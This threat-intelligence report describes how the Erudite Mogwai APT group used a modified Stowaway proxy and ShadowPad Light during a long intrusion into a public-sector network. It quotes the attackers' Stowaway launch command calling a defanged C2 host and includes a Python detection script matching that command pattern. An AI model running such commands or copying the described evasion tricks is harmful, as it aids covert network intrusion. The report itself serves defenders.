APT Group Erudite Mogwai Refines Stowaway for Covert Network Attacks


Summary
Cyble Research and Intelligence Labs came across a blog published by Solar detailing a cyberattack detected by the JSOC cyberattack counter center. The investigation uncovered Stowaway and ShadowPad Light malware in an unmonitored segment of a customer’s network. The attack began as early as March 2023 through publicly accessible web services, with an attempted expansion in November 2024.
The attackers modified Stowaway, incorporating LZ4 compression, XXTEA encryption, and QUIC protocol support to enhance obfuscation and traffic proxying. This activity is attributed to Erudite Mogwai, an advanced persistent threat (APT) group specializing in cyberespionage and data theft. Active since at least 2017, the group has targeted government agencies, IT departments, and high-tech industries in Russia, Georgia, and Mongolia. Positive Technologies previously identified Erudite Mogwai as Space Pirates in 2019, and the group has continuously evolved its tactics and tools.
Recent attacks have leveraged LuckyStrike Agent, a .NET backdoor utilizing OneDrive as a command-and-control (C2) channel, alongside ShadowPad Light (Deed RAT) and a custom version of Stowaway for network penetration. The group also employs various open-source network scanning utilities. Their methods suggest an East Asian origin, leading to their classification as part of the "mogwai" clusters.
Technical Details
In early November, Solar JSOC detected suspicious activity on a public sector customer's infrastructure, triggered by Impacket AtExec executing remote tasks and reconnaissance utilities. During the investigation, security teams discovered Stowaway running on multiple compromised systems, but no direct command-and-control (C2) servers were initially found. Instead, Stowaway instances were operating in port listening mode, likely to evade detection. However, a later discovery on an admin system revealed Stowaway launched with an active C2 server connection wiod[.]mynetav[.]net:443.
Command: C:\Windows\Tasks\lsasss.exe -c wiod[.]mynetav[.]net:443 -s -f AgreedUponByAllParties
Further analysis traced the attack back to a Windows server compromised in February 2024, where ShadowPad Light was deployed. This server was used for lateral movement and hosted over 20 attacker tools, including:
● Keylogger CopyCat
● Fscan (network scanning tool)
● Lscan (network testing utility)
● Netspy (internal network discovery tool)
● LuckyStrike Agent
● Sysinternals ADExplorer (Active Directory utility)
Investigators also identified an initial infection point—a non-domain workstation in the Access Control System (ACS), compromised in March 2023. This workstation was infected with ShadowPad Light and Stowaway, likely deployed from a previously breached Unix web server exposed to the internet in 2022-2023. Attackers brute-forced administrator credentials from this system between March and June 2023, allowing them to infiltrate the network and gradually expand access over 19 months before being detected in November 2024.
Evolution of the Stowaway Malware
Stowaway, originally an open-source penetration testing tool, was heavily modified by the attackers. Key enhancements include:
- Structural Changes:
● Removed UUID tracking and renamed functions to evade detection.
● Eliminated error messages and adjusted protocol structure.
- Encryption and Compression Updates:
● LZ4 replaced Gzip for data compression.
● XXTEA replaced AES for encryption.
- Code & Functionality Tweaks:
● Added custom authentication mechanisms and encrypted pre-authentication tokens.
● Introduced custom message exchange formats for stealth.
● Refined SOCKS5 proxy implementation for traffic redirection.
- Protocol and Communication Adjustments:
● Attackers modified greeting messages (e.g., "Bohemian Rhapsody" ↔ "Queen") as a stealth tactic.
● Introduced QUIC protocol support, leveraging UDP-based encrypted communication for resilience and speed.
The “-f” argument in the attackers’ modified Stowaway serves as a self-verification mechanism to ensure the malware is running as expected.
Recommendations
The following essential cybersecurity best practices form the first line of control against attackers. We recommend that our readers follow them:
● Isolate critical systems and limit communication between network segments to reduce lateral movement. Deploy continuous monitoring and logging (SIEM) to detect suspicious activity, such as unauthorized proxy tools or unusual remote executions.
● Enforce strong authentication (MFA) for administrative access and regularly audit privileged accounts. Monitor for brute-force attempts and restrict the use of remote task execution tools like Impacket AtExec.
● Regularly update endpoint protection to detect customized malware and unauthorized SOCKS5 proxies. Use behavior-based detection to spot modifications of open-source tools and block unauthorized execution of binaries in sensitive environments.
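As an added illustration of the monitoring recommendation above (not code from the report or from Solar/Cyble), the script below runs a few process-creation checks over constructed sample records: a binary executed from C:\Windows\Tasks, a file name that imitates a system process (lsasss.exe versus lsass.exe), and the "-c host:port -s -f token" argument pattern quoted in the Technical Details section. The field names, the sample records and the choice of imitated system names are assumptions for the example.

```python
import ntpath
import re

# Constructed sample process-creation records (not real telemetry). Record 1
# mirrors the Stowaway launch quoted in the report; the others are controls.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\lsass.exe", "cmdline": r"C:\Windows\System32\lsass.exe"},
    {"image": r"C:\Windows\Tasks\lsasss.exe",
     "cmdline": r"C:\Windows\Tasks\lsasss.exe -c wiod.mynetav.net:443 -s -f AgreedUponByAllParties"},
    {"image": r"C:\Windows\Tasks\svchosts.exe", "cmdline": r"C:\Windows\Tasks\svchosts.exe -l 8080 -s"},
    {"image": r"C:\Program Files\Vendor\agent.exe", "cmdline": r"agent.exe -c config.yml"},
]

SYSTEM_NAMES = {"lsass.exe", "svchost.exe", "csrss.exe"}       # assumed list of imitated names
LEGIT_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")  # where those binaries really live
# Argument shape from the report: -c <C2 host>:<port> ... -s ... -f <self-verification token>
STOWAWAY_ARGS = re.compile(r"-c\s+\S+:\d{1,5}\b.*\s-s\b.*\s-f\s+\S+", re.I)

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one-character variations of system names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike_of(name: str):
    """Return the system binary name this file name imitates, or None."""
    for sys_name in SYSTEM_NAMES:
        if name.lower() != sys_name and edit_distance(name.lower(), sys_name) <= 1:
            return sys_name
    return None

def assess(event: dict) -> list:
    """Return the reasons an event should be flagged (empty list means benign)."""
    directory, name = ntpath.split(event["image"])
    reasons = []
    if directory.lower().startswith(r"c:\windows\tasks"):
        reasons.append("executed from C:\\Windows\\Tasks")
    imitated = lookalike_of(name)
    if imitated and not directory.lower().startswith(LEGIT_DIRS):
        reasons.append(f"name imitates {imitated} outside a system directory")
    if STOWAWAY_ARGS.search(event["cmdline"]):
        reasons.append("Stowaway-style '-c host:port -s -f token' arguments")
    return reasons

def scan(events: list) -> dict:
    """Map the index of each flagged event to its list of reasons."""
    return {i: r for i, e in enumerate(events) if (r := assess(e))}
```

Record 1 trips all three checks, record 2 trips the directory and name checks only, and the two controls are not flagged.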
Conclusion
The attackers used ShadowPad Light to deploy a modified version of Stowaway, enabling network persistence, reconnaissance, and lateral movement over nearly two years before reaching monitored segments in late 2024. Their custom Stowaway fork retained only SOCKS5 proxying while removing unnecessary features, renaming functions, and altering structures to evade detection.
Key modifications include LZ4 compression, XXTEA encryption, QUIC protocol support, and a built-in verification mechanism using MD5 hashing to control execution. These changes highlight the attackers' advanced capabilities and strategic use of open-source tools for stealth and persistence.
